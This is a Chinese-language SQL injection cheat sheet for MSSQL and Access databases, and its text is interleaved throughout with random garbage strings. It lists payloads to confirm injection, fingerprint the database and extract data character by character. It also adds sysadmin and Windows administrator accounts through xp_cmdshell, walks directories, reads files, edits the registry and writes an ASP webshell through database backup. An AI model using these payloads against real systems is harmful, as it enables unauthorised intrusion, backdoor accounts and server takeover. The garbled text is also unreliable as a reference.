1.判断是否有注入;and 1=1 ;and 1=2 T�6=~vOzTJ
2.初步判断是否是mssql ;and user>0 "ZG2olOqLI
"gXvn�l��
3.注入参数是字符'and [查询条件] and ''=' #a�adn�bf�
*#B"�%;Ln
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �V�|;os���
D ~�NWP%H
5.判断数据库系统 B�\>�3[�_n
�_9�z+�x�l
;and (select count(*) from sysobjects)>0 mssql vARZwI�u^D
:�]�`�J�cJ
;and (select count(*) from msysobjects)>0 access ho6,��&Bp8
�k-�$�J� #
c`#4}����$
oXG���P6�#
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ��=CL� h<&
#�3�-���hE
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �C��+-�s�f
�q94*�2@KV
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 n:�J�G+1I
�i]0$�7s9!
9.(1)猜字段的ascii值(access) LhK�UZX,P8
D!bi>]�Yd
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 <-!'�V,��c
N|����|�s#
(2)猜字段的ascii值(mssql) [Ib1��7#74
z_:r&U�P`"
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 s1zkkLw`*�
�:LD+B�1$y
10.测试权限结构(mssql) X�Q�j+�]-m
wKy4Ic+R�V
vt�TXs]�>
D �6F��/9|
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ��,>�I_2mc
�_;k)��)K^
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- Le,+�j�m��
�}Q�{�4G
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �C�,5Erb�/
�o%�v,6yv�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- `R���o>�?H
z9^_��5la#
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 2Zi&=��Zj"
@C�5�%`�{\
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 4,ewp coC%
��g)iw�.M2
;and 1=(select IS_MEMBER('db_owner'));-- zf�UkHL��6
#M8>�)o�c�
Jl�89�}Sf�
�Y1� 6p��T
11.添加mssql和系统的帐户 =L}$#Y�8?�
aG�mbB7[BZ
;exec master.dbo.sp_addlogin username;-- s9Bd�mD^|#
;exec master.dbo.sp_password null,username,password;-- _P{v=`�]Eu
f����{#M�c
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- yx/qp�<��=
^4�>Icz^ F
;exec master.dbo.xp_cmdshell 'net user username password \J^xpR_�0u
T�d![I��d
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 2�0mZ{_%��
-��o sxKT:
;exec master.dbo.xp_cmdshell 'net user username password /add';-- .�t�{?doOT
.�n)�0@�X!
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- T���q5F'@e
�Q�9
RCN<!
�Py#iC#�g~
IV$2`)[A&X
12.(1)遍历目录 X[o�"�9O|<
�ps=QVX)YP
;create table dirs(paths varchar(100), id int) g��?��!;04
7R".$ p��
;insert dirs exec master.dbo.xp_dirtree 'c:\' C,3y�u�,'
pPZ^T5-ks�
;and (select top 1 paths from dirs)>0 �����0�mR�
8\8%FS�rc�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) w�7h=vy n?
A�mT*{Fz8�
I�,!>ZG@6
c#�(&\g�2H
(2)遍历目录 1z�=}`,?�>
W�F�F�pW{�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- nB8�6o�Q/S
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �1V���1T1�
!)'|Y5 ��o
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 =_H)�5I_�\
.#ATI�<�t�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �*wfk��jG�
ak�;S �I�e
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 .;��~�K*GC
|)u|�@\�{�
�]c�h�=D�
G��3t
4$3|
13.mssql中的存储过程 0B~Q.��tyP
\��{`*`WQF
xp_regenumvalues 注册表根键, 子键 K?�aUI�kVs
9:6d,^�X�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �*gXm&/�2*
5V��/CY�cO
xp_regread 根键,子键,键值名 �bLyG3~P;0
-<���B{?�D
;exec xp_regread TVFx�EV7Fx
p�=J9N�-EM
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ,<?M/'�4}G
�WWY�G>�C[
xp_regwrite 根键,子键, 值名, 值类型, 值 9<I;9.1S?^
6u� v'{��
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �Fgg4���QF
_d/ZaCx'i�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �VR0#"����
mPo]����.z
xp_regdeletevalue 根键,子键,值名 �_�a=f.�I
\�78kS��hx
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 9CTvG� zkw
dbLxm��!;(
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 I �Ux�svW+
b(H)�8#C�
A'X, zw^�}
n;�Etn!4�M
14.mssql的backup创建webshell c�ZXra(A�D
�!4G�<&hvb
use model �H�=�k*�;'
��b�wA�L�:
create table cmd(str image); & A<P�f.Us
�;F<)BEXC<
insert into cmd(str) values (''); h��8_~ OX
' ! ls�"qo
backup database model to disk='c:\l.asp'; Aw �*:5�I[
k�)R>5?�_
k�|}S K�9�
JP<�Z3
A2q
15.mssql内置函数 ~0>{PD$@��
<=,KP)���
;and (select @@version)>0 获得Windows的版本号 >h�
m<$3
�(&u)F�B*�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa m�=�<��;�)
XL7jUi_4:L
;and (select user_name())>0 爆当前系统的连接用户 n`hes_{�,g
@*c�) �s_
;and (select db_name())>0 得到当前连接的数据库 �L�"6��@3
kY�6�))9 O
QP e}rQ�nm
\;��A\ vQ[
16.简洁的webshell D0&{�iZ�(
�J����;wA
use model (8(z���4�2
�Ma3H���n�
create table cmd(str image); ��dj7��6YK
6gfdX�V�N5
insert into cmd(str) values (''); �+<ey
I�w
Up�$vBE8i]
backup database model to disk='g:\wwwtest\l.asp';
